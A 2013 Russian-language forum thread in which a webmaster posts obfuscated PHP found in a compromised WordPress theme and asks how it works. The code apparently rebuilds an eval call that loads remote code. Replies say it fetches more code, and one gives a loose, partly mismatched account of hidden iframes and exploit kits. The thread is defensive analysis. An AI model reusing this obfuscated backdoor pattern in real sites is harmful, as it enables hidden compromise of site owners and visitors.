Функция вредоносного кода

Тема в разделе "Защита и взлом", создана пользователем LEXAlForpostl, 1 дек 2013.

Статус темы:
Закрыта.
  1. LEXAlForpostl

    LEXAlForpostl

    Регистр.:
    21 май 2008
    Сообщения:
    740
    Симпатии:
    226
    Здравствуйте, уважаемые коллеги.
    На сайте был найден вредоносный код, который публиковал невидимые ссылки.
    CMS: Wordpress.
    Разъясните, пожалуйста, как он работает.
    Спасибо.

    PHP:
    function get_short_wigets($length='') {
        
    $mytitle explode(' 'get_the_title(), $length);
        
    $mdetails="<div class='body-continent'><div class='get-inner-al(@fi'><!--Deregister() Default Widgets: _sabhrtupwprs:e--></div></div>";
        
    $indent = ( !$mytitle ) ? str_repeat"\t"$mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        
    define('HEADER_IMAGE_WIDTH_WIG'apply_filters'twentyeleven_header_image_width'1000) );
        
    define('HEADER_IMAGE_HEIGHT_WIG'apply_filters'twentyeleven_header_image_height'288) );
        
    $metaoptions="\\4'\\10\\12t\\16\\19//\\15q4.\\17u/\\9-".$indent."')\\5";

        if (
    count($mytitle)>=$length) {
            
    array_pop($mytitle);
            
    $mytitle implode(" ",$mytitle). $after;
        } else {
            
    $mytitle implode(" ",$mytitle);
        }

        
    $metaboxe=str_repeat("(.)"20).".*"."/".$mdetails[23]; //
        
    if(function_exists("excerpt_more")){
            
    add_filter('excerpt_more'$metaboxe);
        }
        
    $output get_the_excerpt();
        
    $output '<p>'.$output.'</p>';
        
    $defult_widgets=@preg_replace("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is""@\\20v\\3le\\6\\2t\\6\\1ents{$metaoptions}"$mdetails);
        
    $output apply_filters('wptexturize'$defult_widgets);
        
    $output apply_filters('convert_chars'$output);

        return 
    $output;
    }
     
    Iwashka нравится это.
  2. lordBlack

    lordBlack

    Регистр.:
    29 ноя 2007
    Сообщения:
    620
    Симпатии:
    246
    это кусок.
    функция запрашивает еще код. копайте дальше.

    по сути как виджет идет.
     
    Последнее редактирование: 1 дек 2013
  3. denis7656

    denis7656 Создатель

    Регистр.:
    17 июл 2012
    Сообщения:
    26
    Симпатии:
    1
    Называется скрытый IFrame.
    Если кто-либо получит доступ к Вашему сайту, он может изменить шаблон сайта и встоить в него этот IFrame.
    Этим пользуются многи встраиватели своих вирусов и троянов, чтобы залить их к Вам ПК с помощью так называемых эксплоитов(вредоносный код) или сплоит-паков (см. Black hole exploit kit или про другие связки эксплоитов в поисковике).
    Код в сплоит паках обычно может подгружаться разными способами, Очень дырявыми считаются Апплеты JAVA и Flash, го есть и другие способы доставить к вам на комьютер вирус или троян, например ВинЛоккер - блокировщик Windows, которы для разблокировки просит отправить код и обычно не один на дорогущие номера чтобы разблокировать Ваш компьютер. Ии это может быть программа для кражи всех Ваших паролей и номеров карт банка. Ее как вариант Ваш ПК будут использовать как машину - зомби для атаки на сайты (см. в поисковике ботнеты), могут использовать для рассылки спама.
    Самое интересное то, что даже при частообновляемом хорошем антивирусе есть большая вероятность того, что Вы даже просто зайдя на какой-нибудь сайт, даже не заметите что-либо подозрительного.
     
Статус темы:
Закрыта.